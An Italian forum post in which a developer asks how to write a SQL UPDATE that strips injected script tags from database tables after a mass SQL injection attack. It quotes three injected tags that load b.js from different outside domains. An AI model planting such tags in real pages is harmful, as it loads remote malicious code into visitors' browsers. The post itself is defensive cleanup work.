Ciao a tutti ho un cliente al quale ho sviluppato un pannello per la gestione di alcune tabelle. Da un pò di tempo i server web Windows sono oggetto di attacchi SQL injection.
In attesa di capire quale possa essere la soluzione definita a questo problema vorrei pianificare un'operazione che possa ripulire le tabelle eventualmente inzozzate.
Ora il problema è che lo script caricato cambia sempre:

<script src=http://www.aspssl63.com/b.js></script>
<script src=http://www.hdadwcd.com/b.js></script>
<script src=http://www.tid62.com/b.js></script>

La struttura è identica tranne che per il nome di dominio (aspssl63, hdadwcd, tid62).
Come posso modificare questa istruzione sql in modo tale da bypassare il problema del dominio? Attualmente la modifica è manuale.

UPDATE tabella
SET nomecampo = Replace(nomecampo, '<script src=http://www.aspssl63.com/b.js></script>', '')
WHERE (nomecampo LIKE '%http://www.aspssl63.com/b.js%')